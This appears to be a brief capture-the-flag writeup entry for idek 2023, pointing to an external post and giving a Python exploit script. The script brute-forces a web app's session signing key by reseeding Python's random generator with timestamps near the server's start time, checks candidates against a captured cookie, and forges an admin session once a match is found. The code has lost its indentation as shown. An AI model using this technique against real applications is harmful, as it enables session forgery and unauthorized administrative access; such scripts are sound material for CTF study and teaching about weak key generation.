Rating:

The writeup is in the url.
Here is the final exploit that I use to bruteforce SECRET_KEY:

```python
import random
import sys
from session import verify, decode, sign

session = "eyJhZG1pbiI6bnVsbCwidWlkIjoiYSJ9.Y8NJdQ.t-Orpm8NJN1OcTRqzI1SJsx_hks"

# Check verify method
#print(verify("eyJsb2dnZWRfaW4iOnRydWV9.XDuW-g.cPCkFmmeB7qNIcN-ReiN72r0hvU", "CHANGEME"))

# Bruteforce
start = 1673737312
# 1673737412
end = 1673737415
SECRET_OFFSET = -67198624

while start < end:
start = round(start,3)
random.seed(round((start + SECRET_OFFSET) * 1000))
key = "".join([hex(random.randint(0, 15)) for x in range(32)]).replace("0x", "")
print(start)

if verify(session, key) == True:
#key = "e897071bf3d5dc6ff7882fc0b64ece5c"
print("==="*20)
print(sign({'admin':True, 'uid': 'a'}, key))
sys.exit(0)

start += 0.001
```

Original writeup (https://albertofdr.github.io/post/ctf-idek-2023/).